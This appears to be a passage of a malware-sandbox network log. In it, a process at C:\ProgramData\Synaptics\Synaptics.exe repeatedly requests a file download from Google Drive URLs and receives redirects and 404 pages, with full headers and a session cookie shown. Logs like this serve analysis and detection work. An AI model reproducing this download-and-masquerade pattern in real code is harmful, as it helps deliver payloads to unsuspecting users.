                                                                                                                      2024-12-30 10:40:58 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC7uckmJjbG6pRoIoO_DqJ8hSCNpSPlSVaQFTN34_8IZ47cqTHEM5AVE7cl13xdn0i_1_eZi-c0
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:58 GMT
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-CeNAxE4kT95s6BSGXV5iAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:58 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:40:58 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="XrSyQSqvNMLaW6c39Zg46A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:40:58 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      72 | 192.168.2.6 | 49988 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:59 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:59 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC7fnboO1oysK1SxL2f-Ld-ah3ZxOll19V2MNkCwIEoTBvbEQOP7MVLMnonkpGdQLaOq
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:59 GMT
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-RAZRI47Ns8ojv8t7u_DTcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:59 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:40:59 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="SheKAJPDxzry6l40oBFbOA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:40:59 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      73 | 192.168.2.6 | 49989 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:59 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:59 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:59 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-pZ74gZh-27vWw0ueIqjBkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      74 | 192.168.2.6 | 49993 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:59 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:59 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:59 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-fGFzqDg8-NWnu-OGNzpplA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      75 | 192.168.2.6 | 49992 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:59 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:00 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC4QYR8TdrWc-hFbZ__t4OCTPKdJ6adOlF7lYCO3B-1EGA8P7SsY4303mVdAlmZdEa6E
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:59 GMT
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-xlT_aRDpGHQH9k4OvRktzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:41:00 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:41:00 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="BU5FIPNGp7BrOVMKOTRByg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:41:00 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      76 | 192.168.2.6 | 50003 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:00 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:00 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC56Cshp4Xul7Ybvx4uxkl591XhqgmeJIomstq5s3UE8uZKM3kIDKwq7KOQMuuWxlow0
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:00 GMT
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ZbZPziDJOT7AXu4ld74VwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:41:00 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:41:00 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="U_XsjNBv7NPiUsWbiK6i0w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:41:00 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      77 | 192.168.2.6 | 50001 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:00 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:00 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:00 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-i_o4K1TRDeWnZfE2TNFAYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      78 | 192.168.2.6 | 50004 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:00 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:00 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:00 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-r5xzcnMwpp77inVJvF-SXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      79 | 192.168.2.6 | 50005 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:00 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:01 UTC | 1242 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC5yveiLSskt7iFiFxg6XgpuxgGkEIXbzJHDQQuW1srNQly4ssmh1saYmQEtE8_Xj_k
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:00 GMT
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-saZtOUn30UKr2bjhO9Qryw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:41:01 UTC | 148 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not
                                                                                                                      2024-12-30 10:41:01 UTC | 1390 | IN | Data Ascii: Found)!!1</title><style nonce="_WFNq8wlE11cTk8i-87wpQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:
                                                                                                                      2024-12-30 10:41:01 UTC | 114 | IN | Data Ascii: Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      80 | 192.168.2.6 | 50012 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:01 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:01 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:01 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-b-oGGGke3eV-Uvnn_2bl1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
